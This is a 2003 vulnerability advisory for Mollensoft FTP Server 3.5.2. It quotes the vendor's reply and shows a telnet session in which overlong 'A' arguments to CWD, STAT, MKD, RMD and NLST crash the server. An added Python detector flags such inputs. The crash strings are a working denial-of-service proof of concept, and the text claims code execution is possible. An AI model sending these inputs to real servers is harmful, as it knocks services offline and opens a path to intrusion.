Mollensoft FTP Server 3.5.2 (or Hyperion FTP server)

Release Date: June 4, 2003
Severity: High (remote crash - code execution)
Systems Affected: Mollensoft FTP Server 3.5.2 (possibly all older versions)

Here is the email I got from the company when I informed them about the holes:

----------------------------------------------------------------------------------
From services@mollensoft.com Wed Jun 4 18:33:50 2003
Return-Path:
Received: from mta2.wss.scd.yahoo.com (mta2.wss.scd.yahoo.com [66.218.85.33]) by monster.phaistosnetworks.gr (8.12.8/8.12.8) with ESMTP id h54FXlQN003884 for ; Wed, 4 Jun 2003 18:33:48 +0300
Received: from dragonultra (66.91.163.96) by mta2.wss.scd.yahoo.com (7.0.016) (authenticated as services@mollensoft.com) id 3EDCE7600005EB6A for dr_insane@pathfinder.gr; Wed, 4 Jun 2003 08:30:55 -0700
From: "Services"
To: XXXX XXXXX
Subject: RE: Mollensoft FTP Server 3.5.2 (or Hyperion ftp server) SECURITY ADVISORY
Date: Wed, 4 Jun 2003 05:30:34 -0700
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-reply-to: <200306041525.h54FPe0p029006@monster.phaistosnetworks.gr>

Howdy,

Thank you very much. I am working on a fix, should be out soon.

Thanks for your help.

V/R,
BIGAL
bigal@mollensoft.com

-----Original Message-----
From: xxxxx xxxxxx [mailto:dr_insane@pathfinder.gr]
Sent: Wednesday, June 04, 2003 8:26 AM
To: support@mollensoft.com
Subject: Mollensoft FTP Server 3.5.2 (or Hyperion ftp server) SECURITY ADVISORY

Hello,

Yesterday I downloaded Mollensoft FTP Server 3.5.2. While I was checking it I found some serious buffer overflows in the cwd, mkd, rmd, stat, nlst commands. I am sending you an advisory in order to fix the problems. I hope you will respond!
---------------------------------------------------------------------------

Description:

Many buffer overflows were discovered while I was checking the last version of Hyperion FTP server. Any user can exploit these vulnerabilities to crash the server remotely or to execute arbitrary code (an exploit will be released for this). Various structures can be overwritten in the process heap to gain control of the remote FTP server with administrator privileges.

Let's r0ck (or exploit code)
----------------------------

The following examples will show the vulnerable conditions.

C:\>telnet localhost 21
220 Mollensoft FTP Server 3.5.2 Ready.
user anonymous
331 Password required for anonymous.
pass ins@qwerty.gr
230 User anonymous logged in.
CWD 344 * A
overflow..crash...
Stat 340 * A
overflow..crash...
mkd 270 * A
overflow..crash...
xmkd 270 * A
overflow..crash...
rmd 270 * A
overflow..crash...
nlst 340 * A
overflow..crash...

By supplying one of these commands above the ftp server will crash :>

Credit: Dr_insane

Feedback: Please send comments to: dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/
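A defensive check for the condition described above, as an added example that is not part of the original advisory: it flags the affected commands on an FTP control channel when their argument exceeds a length limit. The 255-byte limit, the function names and the sample lines are assumptions made for illustration.

```python
# Added example, not code from the advisory: flag affected FTP commands whose
# argument exceeds a length limit. Names and the limit are assumptions.
import re

# Verbs the advisory lists as affected (XMKD appears in its telnet session).
AFFECTED_VERBS = {"CWD", "STAT", "MKD", "XMKD", "RMD", "NLST"}
# Assumed policy limit, set below 270, the shortest crashing length listed.
MAX_ARG_LEN = 255

# A command line is a 3-4 letter verb, optionally one space and an argument.
_COMMAND = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$", re.DOTALL)


def inspect_line(raw, max_len=MAX_ARG_LEN):
    """Return (verb, arg_len, reason) if the line should be flagged, else None."""
    match = _COMMAND.match(raw.rstrip(b"\r\n"))
    if match is None:
        return None  # not a well-formed command; out of scope for this check
    verb = match.group(1).decode("ascii").upper()  # verbs are case-insensitive
    arg = match.group(2) or b""
    if verb not in AFFECTED_VERBS or len(arg) <= max_len:
        return None
    # One repeated byte looks like filler rather than a real path name.
    reason = "repeated-byte filler" if len(set(arg)) == 1 else "overlong argument"
    return verb, len(arg), reason


def scan(lines, max_len=MAX_ARG_LEN):
    """Inspect client lines in order; return (line_no, verb, arg_len, reason)."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        hit = inspect_line(raw, max_len)
        if hit:
            findings.append((number, *hit))
    return findings


# Constructed sample of client-to-server lines (not captured traffic).
SAMPLE = [
    b"USER anonymous\r\n",
    b"CWD /pub/incoming\r\n",
    b"cwd " + b"A" * 344 + b"\r\n",
    b"MKD " + b"/deep/dir" * 40 + b"\r\n",
    b"RETR " + b"B" * 400 + b"\r\n",  # long, but not a verb the advisory names
    b"NLST\r\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The same length test can run in a proxy in front of the server or over recorded control-channel logs; the limit should be tuned to the longest path the site legitimately uses.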